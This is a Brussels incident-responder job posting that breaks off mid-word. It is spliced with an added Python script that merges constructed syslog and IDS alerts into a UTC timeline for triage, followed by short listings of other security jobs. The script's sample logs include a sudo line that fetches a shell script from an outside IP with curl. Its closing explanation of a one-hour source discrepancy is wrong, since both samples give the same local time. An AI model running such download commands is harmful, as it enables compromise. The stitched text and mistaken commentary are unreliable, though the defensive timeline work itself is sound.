Incident Responder
7 hours ago
**Location**:
Brussels, Belgium
**Security Clearance**:
EU Secret
**Introduction**:
Security Incident Handling aims to provide a safe communications and information infrastructure for the contracting EU Institutions' (EU-Is') user community and information systems by detecting, analysing and responding to cyber-attacks and security incidents.
The service covers security incident detection, containment, eradication and recovery: taking action to protect systems and networks affected or threatened by intruder activity, providing solutions and mitigation strategies drawn from relevant advisories or alerts, and defining and executing response plans and playbook entries. It also encompasses the standards, processes, tools, technology and skilled staff needed to detect cyber-attacks and security incidents at the earliest stage and to respond to them efficiently.
**Skills, knowledge, experience required**:
- At least 1 certification in the field of incident handling:
- GCIH (GIAC Certified Incident Handler);
- GCIA (GIAC Certified Intrusion Analyst);
- ECIH (EC-Council Certified Incident Handler);
- CSIH (SEI Certified Computer Security Incident Handler);
- SCPO (SABSA Certified Security Operations and Service Management Practitioner);
- Minimum 2 years’ experience in networking (TCP/IP, SNMP, DNS, Syslog-ng, etc.);
- Sound knowledge of and minimum 1 year of experience with IT security issues;
- Sound background and minimum 1 year of experience in the following areas:
- Operating system security and working with multiple operating systems;
- Anti-virus technologies;
- Network security:
- Practical level understanding of common TCP/IP-based services and protocols such as DNS, DHCP, HTTP, FTP, SSH, and SMTP;
- Firewall theory;
- Proxies and reverse proxies;
- Intrusion detection systems (IDS) and intrusion prevention systems (IPS);
- Full packet capture analysis;
- Vulnerability assessment and handling;
- Malware reverse engineering;
- Handling malicious code incidents;
- System (file and memory) and network forensics analysis with tools such as:
- Forensic Toolkit (FTK);
- EnCase Enterprise;
- Knowledge of development and scripting languages such as:
- Python;
- C/C++;
- Java;
- JavaScript;
- Perl or Ruby;
- Regular expressions;
- Linux shell/bash;
- MS Windows PowerShell;
- Minimum 1 year of experience with:
- EnCase Enterprise and EnCase Cybersecurity or FTK/AccessData (AD) Enterprise or Mandiant Intelligent Response (MIR);
- Volatility framework;
- SIFT Workstation or The Sleuth Kit (TSK).
**Desirable**:
- At least 1 certification among the following:
- GPEN (GIAC Certified Penetration Tester);
- GCED (GIAC Certified Enterprise Defender);
- GPPA (GIAC Certified Perimeter Protection Analyst);
- GCFE (GIAC Certified Forensic Examiner);
- GCFA (GIAC Certified Forensic Analyst);
- GNFA (GIAC Certified Network Forensic Analyst);
- CFCE (IACIS Certified Forensic Computer Examiner);
- CCFP (Certified Cyber Forensics Professional);
- SCMO (SABSA Certified Security Operations and Service Management Specialist);
- Minimum 1 year of experience with STIX (Structured Threat Information Expression) with a particular focus on the following related standards:
- CybOX (cyber observables);
- CAPEC (attack patterns);
- MAEC (malware);
- TAXII (threat information exchange).
**Duties/role**:
- Collecting information from, and correlating it across, the available information sources;
- Assessing incoming incident reports and performing efficient triage;
- Acknowledging alerts from/to the reporter;
- Confirming and classifying the incidents;
- Opening the incidents in the workflow system, identifying the stakeholders and notifying them;
- Assigning the case to the appropriate incident handlers and initiating the incident handling process;
- Providing continuous improvement of incident response plans and playbook entries;
- Defining and carrying out security incident identification measures;
- Overseeing the ongoing analysis activities (forensics or reverse engineering) and analysing data in order to build a comprehensive view of the incident;
- Maintaining and sharing incident documentation:
- Drawing up a map of the attacks/incidents with tools such as MS Visio and Maltego;
- Building a reliable timeline of the incident;
- Maintaining a situation report using a relevant information sharing tool (e.g. web portal, wiki);
- Defining response strategy and presenting it to Management for approval:
- Identification, data collection and analysis;
- Containment;
- Eradication;
- Recovery;
- Defining and carrying out containment, eradication, and recovery measures;
- Providing technical assistance to all stakeholders;
- Coordinating incident response;
- Participating in cyber-crisis management and coordination:
- Preparing and maintaining action plans;
- Drafting meeting minutes and reports;
- Following up on the execution of actions decided by the Crisis Committee;
- Arranging crisis logistics, including meetings;
- Examining available information a
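The collection, correlation, triage and timeline duties listed above are the kind of work a responder scripts early in a case. What follows is an added example, not part of this posting or of the employer's tooling: it merges constructed syslog-ng lines and Suricata-style EVE JSON alerts into one UTC-ordered timeline, then marks a high-severity network alert as confirmed only when a host-side event on the same asset corroborates it within a short window. The site time zone (UTC+1), the log year, the hostname-to-IP inventory and every log line are assumptions made for the example.

```python
"""Added example for the triage and timeline duties; not from the posting.

Assumptions (not in the posting): a site clock in UTC+1 for syslog lines
that carry no year or zone, a log year of 2024, and an asset inventory
mapping hostnames to IP addresses. All log lines are constructed samples.
"""
import json
import re
from datetime import datetime, timedelta, timezone

SITE_TZ = timezone(timedelta(hours=1))   # assumed site clock for syslog (no zone in the line)
LOG_YEAR = 2024                          # assumed: BSD syslog timestamps carry no year
ASSETS = {"ws-0042": "10.20.30.42"}      # assumed inventory: hostname -> IP

# Constructed syslog-ng lines (local time) from one workstation.
SYSLOG_LINES = [
    "Jan 14 08:02:11 ws-0042 sshd[2211]: Accepted password for svc_backup from 10.20.30.40 port 51022 ssh2",
    "Jan 14 08:02:40 ws-0042 sudo: svc_backup : TTY=pts/0 ; COMMAND=/usr/bin/curl http://198.51.100.7/a.sh",
]
# Constructed Suricata-style EVE JSON alerts (local time with explicit offset).
EVE_LINES = [
    '{"timestamp":"2024-01-14T08:01:55.000123+0100","event_type":"alert","src_ip":"10.20.30.40",'
    '"dest_ip":"10.20.30.42","alert":{"signature":"ET SCAN Potential SSH Scan","severity":2}}',
    '{"timestamp":"2024-01-14T08:03:02.417000+0100","event_type":"alert","src_ip":"10.20.30.42",'
    '"dest_ip":"198.51.100.7","alert":{"signature":"ET MALWARE Shell Script Download","severity":1}}',
]

# BSD syslog: "Mon DD HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(r"^(\w{3}) +(\d{1,2}) (\d\d:\d\d:\d\d) (\S+) ([^\[:]+)(?:\[\d+\])?: (.*)$")


def parse_syslog(line):
    """Parse one BSD-format syslog line into a normalised event; returns None on no match."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    mon, day, hms, host, prog, msg = m.groups()
    local = datetime.strptime(f"{LOG_YEAR} {mon} {day} {hms}", "%Y %b %d %H:%M:%S").replace(tzinfo=SITE_TZ)
    return {"ts": local.astimezone(timezone.utc), "source": "syslog", "asset": host,
            "summary": f"{prog}: {msg}", "severity": 3}


def parse_eve(line):
    """Parse one EVE JSON alert; strptime's %z accepts '+0100', '+01:00' and 'Z'."""
    rec = json.loads(line)
    if rec.get("event_type") != "alert":
        return None
    ts = datetime.strptime(rec["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z").astimezone(timezone.utc)
    # Attribute the alert to the internal asset involved (assumed inventory lookup).
    ip_to_host = {ip: h for h, ip in ASSETS.items()}
    asset = ip_to_host.get(rec["src_ip"]) or ip_to_host.get(rec["dest_ip"]) or rec["dest_ip"]
    return {"ts": ts, "source": "ids", "asset": asset,
            "summary": f'{rec["alert"]["signature"]} {rec["src_ip"]} -> {rec["dest_ip"]}',
            "severity": rec["alert"]["severity"]}


def build_timeline(syslog_lines, eve_lines):
    """Merge both sources into one UTC-ordered timeline (the 'reliable timeline' duty)."""
    events = [e for e in map(parse_syslog, syslog_lines) if e]
    events += [e for e in map(parse_eve, eve_lines) if e]
    return sorted(events, key=lambda e: e["ts"])


def triage(timeline, window=timedelta(minutes=5)):
    """First-pass classification per asset: a severity-1 IDS alert corroborated by a
    host-side event on the same asset within `window` is 'confirmed', else 'suspected'."""
    verdict = {}
    for ev in timeline:
        if ev["source"] != "ids" or ev["severity"] > 1:
            continue
        corroborated = any(o["source"] == "syslog" and o["asset"] == ev["asset"]
                           and abs(o["ts"] - ev["ts"]) <= window for o in timeline)
        verdict[ev["asset"]] = "confirmed" if corroborated else "suspected"
    return verdict


if __name__ == "__main__":
    tl = build_timeline(SYSLOG_LINES, EVE_LINES)
    for ev in tl:
        print(ev["ts"].strftime("%Y-%m-%dT%H:%M:%SZ"), ev["source"], ev["asset"], ev["summary"])
    print(triage(tl))
```

The point of normalising to UTC before sorting is that the two sources here disagree by an hour in their raw text; without the conversion the SSH scan alert would appear to follow the login it preceded, and the timeline would mislead the handler who relies on it for containment decisions.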
- Incident Responder (6 hours ago), Brussels, Belgium, NRB, full-time: **Trasys International** offers IT Consulting jobs at the **European Institutions** and **International Organizations**. Your main responsibilities: Collection from and correlation with information sources - Assess incoming incident reports and perform efficient triage. Acknowledge alerts from/to reporter - Confirm and classify the incidents; - Open an...
- Incident Analyst (4 days ago), Brussels, Belgium, Stott and May, full-time: Cybersecurity Incident Responder / SOAR Automation Specialist (2 consultants). Contract type: Freelance / B2B. Location: Brussels, Belgium. Work mode: Mainly onsite (90–100%). Duration: Long-term assignment - up to 3 years project. Eligibility: EU nationality required. Role Overview: A large, highly regulated international client is seeking a Cybersecurity...
- SOC Analyst Level 2 (2 weeks ago), Brussels, Belgium, Proximus, full-time: Join Proximus Ada! Within this Proximus' newly created center of excellence for AI and Cybersecurity, the mission of the Security Management and CSIRT teams is to protect Proximus, its customers, its business, its operations and reputation against external and internal threats. You will be fascinated by a highly dynamic environment, the strong...
- Security Operations Specialist (4 weeks ago), Brussels, Belgium, DigiTribe, full-time: About the Role: As a Security Operations Consultant, you'll play a critical role in protecting the bank's digital infrastructure, data, and systems from cyber threats. You will operate within the Security Operations Center (SOC) to detect, analyze, and respond to security incidents while also contributing to continuous improvement initiatives in processes...
- Subject Matter Expert Security (7 hours ago), Brussels, Belgium, HNM Solutions, full-time: The purpose of the "Cyber Defence" team is to prepare and to respond to unauthorized cyber activity. This is done by providing the following services: Proactive - support & intelligence to help prepare and secure bank systems in anticipation of cyber-attacks where threat management ensures collection, assessment and sharing of threat...
- Network Security Engineer (2 weeks ago), Brussels, Belgium, Müller's Solutions, full-time: As a Network Security Engineer at Müller's Solutions, you will be responsible for ensuring the confidentiality, integrity, and availability of our network infrastructure. Your role will include designing, implementing, and managing network security measures to protect our organization's sensitive data from cyber threats. You will work closely with various...
- DBA (7 hours ago), Brussels, Belgium, Satellit, full-time: **We are looking for a DBA for our customer located in Brussels**: **Responsibilities**: **Installation, Configuration, and Maintenance**: Install, configure, upgrade, administer, monitor, and maintain Interparking databases (mainly Microsoft SQL Server, and some PostgreSQL). **Incident Management**: Respond to and resolve database-related incidents and...